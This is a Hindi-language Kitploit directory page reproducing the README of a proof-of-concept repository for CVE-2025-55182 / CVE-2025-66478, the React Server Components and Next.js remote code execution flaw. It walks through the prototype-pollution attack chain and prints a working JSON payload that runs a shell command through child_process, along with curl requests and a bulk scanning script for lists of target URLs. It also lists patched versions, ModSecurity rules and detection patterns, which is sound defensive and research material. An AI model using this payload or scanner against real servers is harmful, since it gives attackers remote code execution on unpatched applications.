Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-POC | Kitploit
उपकरण/GitHubGitHub/huahuai23/cve-2025-55182-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubhuahuai23/cve-2025-55182-poc

CVE-2025-55182-POC

रिपॉजिटरी देखें
18 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 / CVE-2025-66478 भेद्यता पुनरुत्पादन वातावरण

यह React2Shell (CVE-2025-55182) और Next.js RSC RCE (CVE-2025-66478) भेद्यताओं को पुनरुत्पादित करने के लिए एक न्यूनतम MVP है।

⚠️ चेतावनी

यह प्रोजेक्ट केवल सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए है। कृपया इसे उत्पादन वातावरण या अनधिकृत सिस्टम पर उपयोग न करें।

भेद्यता अवलोकन

CVE-2025-55182 React Server Components में एक गंभीर भेद्यता है, जो निम्न को प्रभावित करती है:

  • React: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: ≥14.3.0-canary.77, ≥15, ≥16

हमलावर एक विशेष रूप से तैयार किए गए multipart/form-data अनुरोध के माध्यम से Flight Protocol की deserialization भेद्यता का लाभ उठाकर रिमोट कोड निष्पादन (RCE) प्राप्त कर सकता है।

हमले का सिद्धांत

  1. Chunk रेफरेंस प्राप्त करना: आंतरिक Chunk ऑब्जेक्ट प्राप्त करने के लिए $@N सिंटैक्स का उपयोग करें
  2. प्रोटोटाइप चेन प्रदूषण: $1:__proto__:then के माध्यम से दुर्भावनापूर्ण then विधि इंजेक्ट करें
  3. निष्पादन ट्रिगर करना: Server Action await के समय प्रदूषित then विधि को कॉल करता है
  4. कंस्ट्रक्टर अपहरण: _formData.get को Function कंस्ट्रक्टर में अपहरण करें
  5. कोड निष्पादन: Blob deserialization के माध्यम से मनमाना कोड निष्पादित करें

त्वरित प्रारंभ

1. निर्भरताएँ स्थापित करें

root@kitploit:~
npm install
# 或
yarn install
# 或
pnpm install

2. डेवलपमेंट सर्वर प्रारंभ करें

root@kitploit:~
npm run dev

सर्वर http://localhost:3000 पर प्रारंभ होगा।

3. भेद्यता का परीक्षण करें

प्रदान की गई परीक्षण स्क्रिप्ट का उपयोग करें:

root@kitploit:~
# 单个目标测试
./test-exploit.sh http://localhost:3000

# 或直接使用 curl
curl -X POST http://localhost:3000/ \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
  --data-binary @exploit-payload.txt

यदि भेद्यता मौजूद है, तो आपको प्रतिक्रिया में uid= जैसा आउटपुट दिखाई देगा (id कमांड का निष्पादन परिणाम)।

फ़ाइल संरचना

root@kitploit:~
.
├── app/
│   ├── actions.ts              # Server Actions(漏洞触发点)
│   ├── page.tsx                # 主页面
│   ├── layout.tsx              # 布局
│   └── globals.css             # 全局样式
├── package.json                # 依赖配置(使用受影响版本)
├── next.config.js              # Next.js 配置
├── test-exploit.sh             # 单个目标漏洞测试脚本
├── scan-targets.sh             # 批量扫描脚本
├── exploit-payload.txt         # Exploit payload 文件
├── Cve-2025-55182-modsecurity-rules.conf      # ModSecurity 防护规则
└── README.md                   # 本文件

परीक्षण स्क्रिप्ट विवरण

1. test-exploit.sh - एकल लक्ष्य परीक्षण

जाँचें कि क्या किसी एकल URL में भेद्यता मौजूद है:

root@kitploit:~
chmod +x test-exploit.sh
./test-exploit.sh http://localhost:3000

विशेषता: यदि प्रतिक्रिया में uid= या gid= शामिल है, तो भेद्यता मौजूद है।

2. scan-targets.sh - बल्क स्कैनिंग

कई लक्ष्य URL को बल्क में स्कैन करें:

root@kitploit:~
# 创建目标列表文件
cat > targets.txt << EOF
http://localhost:3000
https://example.com
https://api.example.com:8080
EOF

# 执行批量扫描
chmod +x scan-targets.sh
./scan-targets.sh targets.txt

स्कैन परिणाम vulnerable_hosts.csv में सहेजे जाएँगे।

Payload संरचना का विश्लेषण

root@kitploit:~
{
  "then": "$1:__proto__:then",           // 劫持 then 方法
  "status": "resolved_model",             // 控制执行路径
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",      // 触发 Blob 反序列化
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"  // 劫持为 Function
    }
  }
}

मुख्य बिंदु:

  1. $@0: पहले form-data फ़ील्ड को संदर्भित करता है, Chunk ऑब्जेक्ट प्राप्त करता है
  2. $1:proto:then: Chunk.prototype.then तक पहुँचता है
  3. _response._prefix: इंजेक्ट किया गया दुर्भावनापूर्ण कोड (जिसे Function कंस्ट्रक्टर द्वारा निष्पादित किया जाएगा)
  4. $1:constructor:constructor: Object.constructor.constructor = Function

समाधान

विकल्प 1: सुधारित संस्करण में अपग्रेड करें (अनुशंसित)

  • React: 19.0.1, 19.1.2, 19.2.1 या उससे नया
  • Next.js: 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7 या उससे नया
root@kitploit:~
npm install [email protected] [email protected] [email protected]

विकल्प 2: ModSecurity WAF नियम तैनात करें (अस्थायी शमन)

यदि तुरंत अपग्रेड संभव नहीं है, तो अस्थायी शमन के लिए ModSecurity नियम तैनात किए जा सकते हैं।

Apache + mod_security

root@kitploit:~
# 1. 安装 mod_security
sudo apt-get install libapache2-mod-security2

# 2. 复制规则文件
sudo cp modsecurity-rules.conf /etc/modsecurity/

# 3. 在 Apache 配置中引入规则
sudo vim /etc/apache2/mods-enabled/security2.conf
# 添加: Include /etc/modsecurity/modsecurity-rules.conf

# 4. 重启 Apache
sudo systemctl restart apache2

Nginx + ModSecurity

root@kitploit:~
# 1. 安装 ModSecurity for Nginx
sudo apt-get install libnginx-mod-security

# 2. 复制规则文件
sudo cp modsecurity-rules.conf /etc/nginx/modsec/

# 3. 在 Nginx 配置中启用
sudo vim /etc/nginx/nginx.conf
# 在 http 或 server 块中添加:
# modsecurity on;
# modsecurity_rules_file /etc/nginx/modsec/modsecurity-rules.conf;

# 4. 重启 Nginx
sudo systemctl restart nginx

नियम पहचान विशेषताएँ

ModSecurity नियम निम्नलिखित विशेषताओं को अवरोधित करेंगे:

  • ✅ Flight Protocol विशेषताएँ ($@N, $BN)
  • ✅ प्रोटोटाइप चेन प्रदूषण (__proto__, constructor:constructor)
  • ✅ खतरनाक Node.js मॉड्यूल कॉल (process.mainModule.require, require('child_process'))
  • ✅ कमांड निष्पादन फ़ंक्शन (execSync, exec)
  • ✅ आंतरिक ऑब्जेक्ट संचालन (_response, _chunks, _formData, _prefix)
  • ✅ Server Action अनुरोध हेडर (Next-Action, RSC-Action-ID)

⚠️ ध्यान दें: WAF नियम केवल अस्थायी शमन उपाय हैं और पूर्ण सुरक्षा प्रदान नहीं कर सकते। सुधारित संस्करण में अपग्रेड करना आवश्यक है।

सुरक्षा अनुशंसाएँ

यदि आपका एप्लिकेशन प्रभावित हो सकता है:

  1. तुरंत परीक्षण करें: अपने एप्लिकेशन का परीक्षण करने के लिए test-exploit.sh स्क्रिप्ट का उपयोग करें
  2. तुरंत अपग्रेड करें: सुधारित संस्करण में अपग्रेड करें
  3. कुंजियाँ रोटेट करें: सभी पर्यावरण चर, API कुंजियाँ और डेटाबेस पासवर्ड रोटेट करें
  4. लॉग ऑडिट करें: संदिग्ध Next-Action अनुरोधों के लिए एक्सेस लॉग की जाँच करें
  5. WAF तैनात करें: अपग्रेड से पहले अस्थायी सुरक्षा के रूप में ModSecurity नियम तैनात करें

त्वरित परीक्षण के लिए curl कमांड

यदि आप सीधे curl का उपयोग करके परीक्षण करना चाहते हैं (स्क्रिप्ट का उपयोग किए बिना):

root@kitploit:~
curl -X POST http://localhost:3000/ \
  -H "Next-Action: x" \
  -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad" \
  -H "X-Nextjs-Request-Id: b5dce965" \
  --data-binary @exploit-payload.txt

यदि लौटाए गए परिणाम में uid= या gid= शामिल है, तो भेद्यता मौजूद है।

संदर्भ सामग्री

  • Vercel आधिकारिक घोषणा
  • React GHSA
  • Next.js GHSA
  • CVE PoC (React)
  • CVE Scanner (Next.js)
  • ModSecurity दस्तावेज़

आभार

  • Lachlan Davidson - इस भेद्यता की खोज की और उसे जिम्मेदारीपूर्वक रिपोर्ट किया
  • Meta Security & React Team
  • Vercel Team

लाइसेंस

यह प्रोजेक्ट केवल शैक्षिक उद्देश्यों के लिए है। इस कोड का उपयोग करते समय कृपया संबंधित कानूनों और विनियमों का पालन करें।

टूल डाउनलोड करें